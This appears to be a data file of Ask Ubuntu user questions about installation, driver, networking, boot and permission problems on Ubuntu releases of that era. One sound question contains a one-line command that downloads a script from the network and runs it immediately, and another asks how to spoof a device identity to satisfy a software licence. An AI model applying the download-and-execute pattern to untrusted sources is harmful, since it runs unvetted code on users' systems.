407086	unable to satisfy all constraints on the partition when installing ubuntu from usb	i 've prepared a pc for installing ubuntu 12.04 lts alongside windows vista . these are the steps i 've taken : 1 ) shrunk the c : drive to create 60gb for ubuntu . the disk management utility confirms that part of the disk is unallocated . 2 ) i put ubuntu on a usb stick using the usb installer provided at pendrivelinux.com . 3 ) i then booted my pc from the usb stick and the installation process began . 4 ) at the welcome screen i selected `` install ubuntu '' 5 ) at the preparing to install ubuntu screen all the conditions were satisfied . 6 ) at the installation type i selected the option to install ubuntu alongside them . then the message pops up : unable to satisfy all constraints on the partition . can anyone explain how to overcome this ? update thanks for all the responses . following rod 's advice i was able to resolve the problem but all the answers helped .
407088	understanding different ubuntu distros and programs	i am slowly stumbling through ubuntu . i use the unity interface , which if i understand correctly , sits on top of gnome ( or is it gtk+ ? ) and uses lightd { isplay } m { anager } . i also understand there are different distributions . kde uses the plasma display manager , and kubuntu is an ubuntu base using plasma instead of lightdm . my question , if i want to use a program made for kde , xfce , etc . can i run it normally in unity or must they be from the kubuntu xubuntu variants ? and to do so will i need to download a number of supporting files or will i need download a separate desktop and restart in a new session ? i 'm certain there are exceptions or a `` grey area '' , but i would appreciate a more conceptual answer . i often find that a list of directions/steps , though helpful , leaves me asking `` why '' and does n't really further my understanding . thank you in advance for any help you can offer
407089	lubuntu 12.04 on powerbook g4	i 've been trying to resurrect an old powerbook g4 . so i tried lubuntu 12.04 . it boots up to this error message : `` error : firmware fload the correct version for this driver.ile `` b43/ucode5.fw '' is not found . error : firmware file `` b43-open/ucode5.fw '' is not found . error : you must go to `` http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this device . please carefully read the instructions on this site . ''
407090	processor tunable status according to powertop	i am absolutely new to the linux platform , since i just migrated to ubuntu 13.10 from windows8 . i installed powertop so that i could assess my processor . the tunables window of the output returned by the $ sudo powertop command really came as a shock to me . most of the entries were bad . do i need to be worried ? is there something i should do about it ? please suggest
407093	duplicate copy of ubuntu	i run the ubuntu software three separate times because i could n't get my computer to boot after i finished the installation . i finally get it to work after running boot-repair but i think i have three copy of the software on my computer . how do i uninstall the two extra copies
407095	can not even boot from 13.04 or 13.10 live usb	i would like to do a fresh install of ubuntu 13.10 ( or maybe 13.04 ) , yet i can not even boot from the live usb with the try ubuntu option . i get to a screen than offers me to run in low graphics mode , reconfigure graphics and some others i ca n't quite remember , yet i have no keyboard or mouse , so ca n't select any of these bullets to continue . i 've ran 12.04 on the system without too many problems , and the 12.04 live usb works out of the box . what can i do ?
407098	why is python v3.3 installed by default on xubuntu 13.10 ?	i am running xubuntu 13.10 , 64 bit . python -- version outputs python 2.7.5+ which is normal since python 2.7 is installed by default on all linux distros . but when i go to software center - > and click on the installed tab - > development tools . i see python ide version 3.3 . is it installed by default on all ubuntu/xubuntu 13.10 ? and if so , why ?
407100	installing boot-repair 64 bit on my computer	i recently installed ubuntu in my computer , once it installed it was unable to boot windows saying that it was crashing due to the modifications the computer recently went through , then i heard about boot-repair which i also installed on my computer but now its telling me that i need the 64 bit version which i already downloaded and wrote it on a cd , but when i try to run the program both through the cd and just the downloaded file it never opens or starts running , any comments ? thank you for your time .
407105	ubuntu wireless tp link problem	hello i just replaced my ethernet cable with a wireless router tl-wr340g but on ubuntu it is n't working i have dual boot win7/ubuntu 13.10 and i 've got no problem with my internet on win7
407106	how to view the last user that accessed a folder in the terminal ?	is there a command to give me the last user that accessed a specific folder in ubuntu ? it is like auditing the folder for security reasons .
407108	ubuntu13.04 wo n't boot	i have tried with 12.04 lts and 13.04 and it will install fine but when i have to reboot the computer it just freezes on a black screen and i ca n't seem to get it to boot again . once it froze on the purple screen with random colours everywhere so i googled that and it said to use nomodeset but that did n't help .
407114	permissions problems with ubuntu 12.04 web server ( nginx + php5-fpm )	i 've been trying to wrap my head around the permissions system on linux , but i 'm having some problems . i setup a web server using the tuxlite.com script and everything works fine , as long as i login as root to do everything . when i create a new user ( to give to a friend so he has sftp access to his website ) , i always get the permission denied errors . when i login as root and navigate to a website 's public_html folder , and run a ls -l command , i get : drwxr-xr-x 2 513 513 4096 sep 6 2010 cgi-bin -rw-r -- r -- 1 nobody nogroup 418 sep 24 17:18 index.php -rw-r -- r -- 1 nobody nogroup 19929 jan 18 2013 license.txt -rwxr-xr-x 1 513 513 13954 sep 15 2006 logo.jpg -rw-r -- r -- 1 root root 2 apr 9 2013 mu-a2015d17-2c5383c6-75806bff-31148a7c.txt -rw-r -- r -- 1 nobody nogroup 7183 nov 20 16:21 readme.html -rw-r -- r -- 1 nobody nogroup 4892 oct 4 07:12 wp-activate.php drwxr-xr-x 9 nobody nogroup 4096 dec 12 09:01 wp-admin -rw-r -- r -- 1 513 513 1354 jul 5 2012 wp-app.php -rw-r -- r -- 1 513 513 226 apr 21 2011 wp-atom.php -rw-r -- r -- 1 nobody nogroup 271 jan 8 2012 wp-blog-header.php -rw-r -- r -- 1 nobody nogroup 4795 sep 5 18:38 wp-comments-post.php -rw-r -- r -- 1 513 513 244 apr 21 2011 wp-commentsrss2.php -rw-r -- r -- 1 nobody nogroup 3087 oct 24 15:58 wp-config-sample.php -rw-r -- r -- 1 513 513 3576 apr 14 2013 wp-config.php drwxr-xr-x 7 nobody nogroup 4096 dec 12 09:01 wp-content -rw-r -- r -- 1 nobody nogroup 2932 sep 24 17:18 wp-cron.php -rw-r -- r -- 1 513 513 246 apr 21 2011 wp-feed.php drwxr-xr-x 12 nobody nogroup 4096 dec 12 09:01 wp-includes -rw-r -- r -- 1 nobody nogroup 2380 oct 24 15:58 wp-links-opml.php -rw-r -- r -- 1 nobody nogroup 2359 oct 24 15:58 wp-load.php -rw-r -- r -- 1 nobody nogroup 31909 dec 3 12:12 wp-login.php -rw-r -- r -- 1 nobody nogroup 8235 nov 13 03:58 wp-mail.php -rw-r -- r -- 1 513 513 413 may 18 2012 wp-pass.php -rw-r -- r -- 1 513 513 224 apr 21 2011 wp-rdf.php -rw-r -- r -- 1 513 513 334 may 18 2012 wp-register.php -rw-r -- r -- 1 513 513 224 apr 21 2011 wp-rss.php -rw-r -- r -- 1 513 513 226 apr 21 2011 wp-rss2.php -rw-r -- r -- 1 nobody nogroup 10880 nov 4 16:24 wp-settings.php -rw-r -- r -- 1 nobody nogroup 25665 nov 12 19:23 wp-signup.php -rw-r -- r -- 1 nobody nogroup 4026 oct 24 15:58 wp-trackback.php -rw-r -- r -- 1 nobody nogroup 3015 oct 24 19:29 xmlrpc.php so it seems that 513 and nobody own most of these files - is that why none of the users i create using adduser are allowed to modify them ? when i setup this web server , i followed the linode library tutorials and ran these 2 commandsâś adduser friendaccount usermod -a -g sudo friendaccount i added friendaccount as an allowed user in /etc/ssh/sshd_config - i can successfully login to the server on the command line via ssh . but when i navigate to the directory - to test if it 's working - and run `` touch file1 '' i get errors . touch : can not touch `file1 ' : permission denied my goal is to figure out how to add users so they can have their own sftp accounts and upload/download files . i 've been doing everything as root for the past few years since i 'm not entirely understanding the permissions .
407115	a command to list share folders in my network ?	i am a new ubuntu user , i have a question about commands in terminal . is there a command that list all shared directories in my network ? any idea ?
407116	how to revert back to fglrx-updates driver ?	i switched to xorg graphics driver and rebooted but then i faced some error messages so i switched to fglrx proprietry drivr since i read its more stable thab fglrx-updates ' ! ! ! ' , so after installing this stable driver , ubuntu boots into a black screen and i have no other convinient way to search for a soluyion other than uding my phone which is ectremly annoying , your help is very much appreciated . i basically need to revert back to fglrx-updates driver or whatever so i can login to ubuntu normally again , thank you .
407119	ubuntu 13.10 shared folder on external hdd problem	a couple of days ago i 've made a fresh install of ubuntu 13.10 64bit on my laptop and my desktop . eveything seems to work fine except one thing . when i tried to share some folders on my home network using samba i could n't share my external hard drives connected via usb . i had no problem with all the others `` onboard '' folders , just with the external drives which i had shared before with 13.04 32bit . when i go to properties and try to change who can access the folders it keeps showing `` nobody '' . the drives are visible from my laptop and even an android tablet but i have no `` rights '' to access them . any ideas what the problem might be ?
407122	how to setup exim4 for incoming and outgoing mail using a gmail email account ?	i 'm new to using ubuntu and liking it so far . so far i have : installed and kind of configured apache , mysql and using joomla cms i have also installed exim4 and other files needed . the problem i have is that i can not for the life of me get mail from google . i can send a message to my gmail using terminal with the commands : $ echo test | mail -s `` test '' ubuntu $ echo test | mail -s `` test '' blabla @ gmail.com i receive a message in my inbox which is great . i now need to actually download the mail . so i need the commands used for this . i think once i do it i use the command : $ mutt -f /mail/ubuntu // to read the email . i also need to set it up so four users can use that same email but get messages sent to them but do not have a clue how to do it using command line . if somebody could help that would be great , or give me a link on how to achieve either of these problems i am facing
407124	how do i create a partition in order to dual boot win7 ?	i just got a new laptop from a friend and i 'm decent with computers , however , i am a huge noob when it comes to linux os ( besides backtrack ( ; ) . i downloaded gparted , but there is no way that i am able to create a partition as they are all mounted and in use . will i need to back up everything on this hdd and then wipe it in order to make a partition to dual boot windows ? i 'd rather not go through all that trouble . i have a valid copy of win7 ultimate and i 'd really like to have a nice laptop with a couple of decent oses on it . please help ! !
407131	why is plymouthd crashing on startup ?	every time my laptop boots , i am greeted by several `` ubuntu 13.10 has experienced an internal error '' dialogs once the graphical desktop environment ( whatever it 's called ) is displayed . apparently the problem originates from plymouthd , which is ( unsurprisingly ) the daemon of the plymouth boot splash application . has anyone ever found a fix for this type of issue ? ( i would provide log excerpts but i 'm not sure where to find them . )
407133	ubuntu 13.10 on acer c720	does anyone know how to do a clean install of ubuntu on this chromebook ? by this i mean that i want to totally remove chromeos and only use ubuntu , i do n't want to use crubuntu . just a link to a guide would be fine , thanks ! : )
407137	wifi keeps disconnecting at random times	i have ubuntu 13.04 and my wifi is disconnecting automatically after 15-20 minutes of using it . it is really annoying , and i was wondering if there were any drivers to stop this . my wifi is also different from windows , which shows every wifi network , when on ubuntu , i am limited to networks which are within 10-15 ft . i have the atheros ar9285 wireless adapter . how can i fix this ?
407138	sound is not working , how to fix ?	i am not able to have sound in any video or cd . i tried different stuff to play sound and is not working . i know the problem has to do with the driver and i know i have mute one of the drivers . i did the command sudo lspci . this is what it came up . 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( external gfx0 port b ) ( rev 02 ) 00:00.2 iommu : advanced micro devices , inc. [ amd/ati ] rd990 i/o memory management unit ( iommu ) 00:02.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( pci express gpp port b ) 00:03.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( pci express gpp port c ) 00:04.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rd890 pci to pci bridge ( pci express gpp port d ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 42 ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 ide controller ( rev 40 ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) ( rev 40 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller ( rev 40 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:15.0 pci bridge : advanced micro devices , inc. [ amd/ati ] sb700/sb800/sb900 pci to pci bridge ( pcie port 0 ) 00:16.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:16.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 0 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 15h processor function 5 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] robson ce [ radeon hd 6370m/7370m ] 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] cedar hdmi audio [ radeon hd 5400/6300 series ] 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] robson ce [ radeon hd 6370m/7370m ] 02:00.1 audio device : advanced micro devices , inc. [ amd/ati ] cedar hdmi audio [ radeon hd 5400/6300 series ] 03:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) this is also the list of devices my computer is reading . i played cd , dvd and youtube videos.. and i see the videos and the graphics hat shows everything is working but , no sound is been output by the computer . what i need to do to fix my sound ? is it this enough information to fix the sound ? list of playback hardware devices card 0 : sb [ hda ati sb ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : sb [ hda ati sb ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : generic_1 [ hd-audio generic ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i have ran the following command : wget -o alsa-info.sh http : //www.alsa-project.org/alsa-info.sh & & chmod +x ./alsa-info.sh & & ./alsa-info.sh this is the link to the info i get . i do not understand much about.. http : //www.alsa-project.org/db/ ? f=66f48b12f4df181d7ebf5ae5d8c5eda971ba69c0 some can checked and tell me why my sound is not giving me any output ?
407139	my battery status is n't showing	i have ubuntu 13.04 , 32-bit , on a 64 bit laptop , and i noticed that the battery status is n't showing at the top of the screen , and i really need to know my battery status . how can this be solved ?
407144	mobile version of ubuntu for nokia n97	this is not a ubuntu touch related question . is there a mobile version of the ubuntu os for nokia n97 ? . if there is : how to install it ? . where to download it ? . how to set preferences ? . is there a `` ubuntu apps store '' ? ( not the ubuntu software center , i mean apps for mobile phones , including touch screen games and that kind of stuff ) .
407150	giving ubuntu the same id as windows	i alternate between windows and ubuntu , depending on what program i am using . however , there are some pieces of software that i only have one license to ( mostly windows software that i can run on ubuntu with wine ) . for some reason , the software registers that my ubuntu os is on a different device than my windows os . how do i make my ubuntu os identify as the same device that my windows os identifies itself as ?
407155	could n't install ubuntu on my phone	well , i have a nexus 4 and tryed to install the ubuntu on it with the manual download & installation , but when i try to do this : fastboot flash system trusty-preinstalled-system-armel+mako.img . its says `` failed `` what could be happening ?
407158	runs fine from flash drive but not when installed . please help !	hey guys i have an issue here with installing ubuntu and pear os . i have tried both from my usb and they both work fine off the flash drive . i installed them on my laptop and every time on both ubuntu and pear os i get to the log in screen and on pear os the screen is half black and i ca n't see any button or anything , and its pretty much the same thing with ubuntu . i have tried reinstalling them a few times recommended setting , i also tried formatting the hard drive and all that good stuff but i keep getting the same issue . my laptop is a `` hp probook 6455b '' . i had no issues installing ubuntu on my mac so i have installed in the past fine but i really want it on my laptop . any help would be much appreciated ! please be clear on instructions because while i consider my self to be good with computer and stuff i do n't really know linux very well , just mac and windows .
407159	ubuntu will not install , trial version can not connect to the internet	i attempted to install ubuntu from my flash drive on to my machine . while installing i could not connect to the internet . all it would say is network , disconnected you are now offline while installing and in the trial version . meanwhile windows still was perfectly capable of connecting to the internet . i am plugged directly to my router by ethernet cable through my motherboard with is a asrock z87 fatal1ty . after installing ubuntu on a partion on the same ssd as windows 7 i did not have an option to boot ubuntu and i could not find the partition using the trial version of ubuntu . i read i should download something called boot repair , which also could not connect to the internet . i did not attempt to use boot repair because it said that without internet it would prevent my computer from being able to boot at all . i have never used a linux distribution before in my life . i am using ubuntu 12.04.3 lts
407160	13.10 brightness flickering msi wind u100	vanilla install of ubuntu 13.10 on my msi wind u100 . intel graphics card i think . auto brightness flickers up and down , brightness hud display top-right also flickers . interrupts input so need to restart to fix . issue is triggered by attempting to adjust screen brightness by fn+f4/fn+f5 , looking at the brightness & lock control panel in system settings , or when laptop goes into battery saving mode ( or whatever happens when the battery gets really low ) . very similar to this issue . issue is temporarily fixed with this code : sudo chmod u-w /sys/class/backlight/acpi_video0/brightness but issue returns after a restart . prior to running this code the brightness settings do not appear in brightness & lock , after running this code the brightness settings appear but the brightness slider does n't work . thank you !
407162	ubuntu desktop is blank	i am faced with an issue . when i login to my desktop environment ( gnome-session-fallback ) the desktop is blank , it does n't load any desktop icons or the desktop image and i can not click it either . i did recently install gnome-shell , although it did n't work out and i uninstalled it , now i am presented with the black desktop . thanks in advance .
407163	ubuntu having problems reconnecting on wireless network after suspend	i have searched for an answer but have n't found a simple solution or one that shares my setup . this problem should be pretty clear cut so maybe someone can help . here 's my set up . have an hp dual-core machine , 2gb ram . using ubuntu 12.04 , with lubuntu-desktop installed . works great . my original install was version 11 of ubuntu about 2 years ago , and i replaced the usb network adapter about 18 months ago with more up-to-date model capable of `` n '' speeds . i ditched network-manager in favor of wicd which is more user friendly , but the problem i am having existed before wicd was installed and before lubuntu/openbox desktop was added . it also existed with my previous wireless adapter . the encryption on my router is wpa2 with psk . this is the only secure encryption that works with wireless-n . using a usb wireless n adapter . lsusb and iwconfig output here : bus 001 device 003 : id 0bda:8172 realtek semiconductor corp. rtl8191su 802.11n wlan adapter wlan1 ieee 802.11bgn essid : '' k******** '' nickname : '' rtl_wifi '' mode : managed frequency:2.437 ghz access point : 58:6d:8f : a4 : de:92 bit rate:72 mb/s sensitivity:0/0 retry : off rts thr : off fragment thr : off power management : off link quality=91/100 signal level=82/100 noise level=0/100 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 so my workaround is to remove the usb adapter and reinsert it after the computer wakes up . but i do n't want to have to do that all the time . it appears to be a problem related to wpa_supplicant ... my guess is that ubuntu does not configure it properly and manual tweaking is needed to make the power management work . i did install wicd and wicd-gtk last week and removed the network-manager packages . i did a purge on network manager and it still seems to work fine . i do n't want to play with it on my own as it works , but it would be nice if someone found a fix . i do n't even know what the proper location of wpa_supplicant.conf should be or whether it matters . i tried using iwconfig to turn on power management in the device and it did not do anything . though i do n't think this is the real issue . logs indicate there may be a problem with wpa_supplicant ... $ tail -50 /var/log/pm-suspend.log running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/55wicd resume suspend : /usr/lib/pm-utils/sleep.d/55wicd resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager resume suspend : having networkmanager wake interfaces back up ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager resume suspend : success . as you can see , 55networkmanager is still a process in my system ( which suggests that wicd still depends on it ? ) . btw , pm-utils is installed and depends on a large number of packages : acpi-support gnome-power-manager gnome-session gnome-session-bin indicator-power indicator-session lubuntu-desktop nautilus-share pm-utils ubuntu-desktop upower xfce4-power-manager what should i try next ?
407164	vlc stops when hitting power button	if i have a non-predefined playlist playing and by accident i hit the power button , 2 things happen immediately : vlc closes it self up . the `` lock , suspend , restart , shut down '' interface shows up , and i have the option to hit esc to come back to my system . so my non-predefined playlist is gone . way to change that behaviour ? .
407166	mininet ovs-controller error	previously i was able to emulate the default sdn nodes using $ sudo mn but now same system in my vb shows following error and mininet console is not shown ! how to manually configure and fix this issue ? on the contrary , running mininet on a terminal window using the following command . this starting a network emulation environment to emulate 1 switch with 3 hosts . sudo mn -- topo single,3 -- mac -- switch ovsk -- controller remote successfully allow to enter the mininet console .
407167	how do i access ubuntu on acer chromebook after installation ?	i have installed ubuntu in my chromebook but it only boots into chrome os . my goal is to have my chromebook booting into ubuntu .
407168	wireless driver lenovo flex 14 ubuntu 12 ultrabook	i recently bought a lenovo ideapad flex 14 and the wireless card is not working and there are issues with the brightness when i start the computer . i tried the tips that are already given for the same issues for the yoga 13 , but i ca n't bring it to work . any ideas how to get the wireless working ?
407171	ubuntu 12.04 - fuser high cpu	the problem is fuser high cpu and server load high . root 20 0 7580 840 692 d 10 0.0 0:00.31 fuser 16061 root 20 0 7580 844 692 d 10 0.0 0:00.31 fuser 16062 root 20 0 7584 840 692 r 9 0.0 0:00.28 fuser 16063 root 20 0 7584 840 692 r 8 0.0 0:00.26 fuser 16054 root 20 0 7584 840 692 d 8 0.0 0:00.25 fuser 16057 root 20 0 7580 840 692 d 8 0.0 0:00.25 fuser 16059 root 20 0 7580 840 692 d 8 0.0 0:00.25 fuser 16056 root 20 0 7580 840 692 d 8 0.0 0:00.24 fuser 16060 root 20 0 7580 836 692 d 8 0.0 0:00.24 fuser 16058 root 20 0 7580 836 692 d 6 0.0 0:00.19 fuser 16064 root 20 0 7584 836 692 r 5 0.0 0:00.17 fuser i find the question : http : //ubuntuforums.org/showthread.php ? p=11456671 it 's a 11.10 bug ? but my server is 12.04 my server /etc/cron.d/php5 09,39 * * * * root [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete and set to 09,39 * * * * root [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) -delete also does not work . quesiton : change /etc/cron.d/php5 will cause the problem ? now , how do i locate the problem ?
407172	ca n't start gui in ubuntu after run 'shutdown -r now '	after i run sudo shutdown -r now to restart ubuntu , it ca n't automatically start the gui . but i can still login in the command line . this is the first time i come across this problem . i have used sudo shutdown -r now for many times before . when i try to start gui sudo /etc/init.d/lightdm start . it stop here . and in /etc/default/grub i do n't know whether grub_cmdline_linux_default= '' quiet splash '' means it will start gui automatically and in the command line , it seems that it 's tring to start nginx and postgresql automatically and stop here . * starting postgresql 9.1 database server startging nginx : nginx . speech-dispather disabled ; edit /etc/default/speech-dispatcher saned disabled ; edit /etc/defaultned *checking battery state i do n't know if it has something to with my problem . and my ubuntu is installed in vmware . what happen here ?
407174	evince error in opening a pdf file	( evince:5754 ) : evincedocument-critical ** : ev_document_get_n_pages : assertion 'ev_is_document ( document ) ' failed
407175	how to take screenshots with a timestamp and date stamp ( with scrot command )	how to take screenshots with a timestamp and date stamp ( with scrot command ) ? i forget the dates and i dont have time to go to properties and see the date . also , dates are n't written on the panel even ! i use lubuntu 13.10 and 512 mb ram
407176	usb installation : first boot problem	i 'm trying to install ubuntu 13.10 alongside windows 7/64 bit . everything was going fine , using a live usb . the trial is running fine . but when i tried to boot using ubuntu , all i get is a black screen with a blinking cursor in the top left corner . i used the boot repair app , as well as the suggestions for problems with nvidia graphics cards to no avail . the url boot repair gave me this . any help you could give me would be much appreciated .
407177	desktop taking ages to load	i 'm using ubuntu-gnome 13.10 and whenever i login it takes ages ( approx 90 sec ) for the desktop screen to come up . the login screen works fine , it 's just after i type in the password and login the problem occurs . any ideas as to how to fix it ?
407178	.iso to .img permission denied	im trying to make a bootable usb thumbdrive with ubuntu 13.10 on a mac . im getting `` permission denied '' at step 3 , converting a .iso to an .img . i 've set all the permissions to read & write . with no luck . any ideas anyone ? just like this guy ... ... when i copy and paste the download into terminal and then copy and paste the example after it , it should comvert from an iso file to an img file . it just says on terminal 'permission denied ' . not sure what to do . for clarity when i 'm referring to item # 3 how to install ubuntu on macbook using usb stick download the desired file open the terminal ( in /applications/utilities/ or query terminal in spotlight ) convert the .iso file to .img using the convert option of hdiutil hdiutil convert /path/to/ubuntu.iso -format udrw -o /path/to/target.img i 've tried a few different permutations my result is always `` permission denied '' .
407179	install asus ac-53 wireless adapter	just installed ubuntu alongside windows . unfortunately , i require an asus ac-53 usb wireless adapter to connect to my home network . how can i get this adapter to work with ubuntu ? i have n't yet been able to find any relevant documentation that would help . thanks .
407180	making game fullscreen with playonlinux	i 'm fairly new to playonlinux and am attempting to play mass effect ( via steam ) on ubuntu 13.10 with a display of 1920 x 1080 . in order to get the game running without screwing up the display , i switch to 1280 x 960 before starting the game . ( if i do n't do this , i end up rebooting because the display becomes almost unusable . ) unhappily , the game then runs in a sort of 'letterboxed ' way . the full game display takes up only a small area of the screen , with blackness surrounding it . how can i either get the game to display fullscreen with the 1280 x 960 resolution or get the game to display fullscreen with the 1920 x 1080 resolution ( nicer option ) ? thanks for any ideas !
407184	change ownership of a large group of files	an app ( autokey-qt ) installed itself with root as owner . it spans a lot of files and directories . i need to change the ownership to me in order to be able to edit the macros and configuration files . i 'm going one by one by checking their name and location with nautilus search but it 's taking forever . is there a way to make chown to execute a change of owner to all files and dirs in the disk from root to me ? right now as i locate them i copy the path from the file properties dialog and then do a sudo chown -hvr jorge / < file path > /autokey . i want to believe there 's a switch to find and chown every file and dir with autokey on its name ( autokey might be part of the name or be capitalized ) or even within the contents of the file ( a python scrip for example ) . thanks for any help . jorge .
407186	getting error while installing eclipse in my system	i am following this article for installing eclipse in my linux system . how to install eclipse ? i extracted the eclipse.tar.gz sudo -i cp -r eclipse /opt in the 3rd step i am getting this error . cp : can not stat `eclipse ' : no such file or directory the real name of the tar file was eclipse-standard-kepler-sr1-linux-gtk.tar.gz which i renamed to eclipse.tar.gz what i am doing wrong ? thanks in advance .
407188	upgraded to 12.10 from 12.04 lts	i upgraded to 12.10 from 12.04lts . i ca n't see any of my side menu bars . both my menu and status bars look like static . how to fix it ?
407189	accidentally release my hard disk.vdi from virtual machine	i accidentally released one of the vdi 's from my virtual machine using 'virtual media manager ' in 'virtual box ' . how can i attach it again ?
407192	what would cause /var/log/syslog to only be written to when executing rsyslog -d ?	i have one system where /var/log/syslog is written to as expected , and another system where it ca n't be written to unless i stop rsyslog service and run it manually with `` rsyslog -d '' . how do i debug this problem ? i tried deleting everything in /etc/rsyslog.d/ , recreating it . i tried removing and reinstalling rsyslogd apt-get remove rsyslogd and apt-get install rsyslogd ubuntu-minimal and then checked that service is running but only the other logs are being updated , not /var/log/syslog . i am just trying to have the default configuration of rsyslog working . i noticed that /var/log/syslog is root : adm instead of syslog : adm . the log files that are syslog user work ok . if i make /var/log/syslog syslog : adm , then it starts working . perhaps the permissions are broken somehow . does n't logrotate change the permissions / create these files again later ? not sure if the fix will be permanent or not .
407198	hp mini 1110nr ubuntu 12.04.3 lte no wired or wireless internet	i have an hp mini 1110nr i just installed ubuntu 12.04.3 via usb flash drive the program booted up fine but the dongle for wifi is orange which means no wifi . i connected the ethernet cable and the computer will not establish a connection . i have searched the forums and tried many sudo apt-install ... but i keep getting the message that the package does not exist . i have been trying to find a fix for about 3days now . i need help . lspci 00:00.0 host bridge : intel corporation mobile 945gse express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gse express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 02 ) 01:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 02:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller lspci -nn | grep -e 0200 -e 0280 01:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) 02:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8040 pci-e fast ethernet controller [ 11ab:4354 ]
407200	internal error ?	i 've never asked a question here before so bear with me . i 'm running 13.04 and whenever i run my package manager it does n't fully execute because it comes up with an error saying it ca n't open my cache and says that my packages have unmet dependencies . i do not know if my cache does n't exist or what to do exactly . i 'd like to just update to 13.10 but it wo n't let me run the package manager and i am not able to do so manually . any assistance would be greatly appreciated . thanks ! namaste
